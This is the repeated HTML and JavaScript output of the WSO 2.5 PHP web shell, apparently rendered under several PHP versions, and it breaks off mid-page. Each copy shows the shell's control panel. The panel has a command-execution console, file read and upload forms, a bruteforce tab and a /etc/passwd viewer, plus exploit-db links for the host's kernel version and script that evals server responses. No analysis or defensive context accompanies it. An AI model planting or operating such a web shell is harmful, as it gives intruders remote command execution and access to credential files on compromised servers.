width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.25 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.24
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.24 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.23
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.23 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.22
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.22 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.21
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.21 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 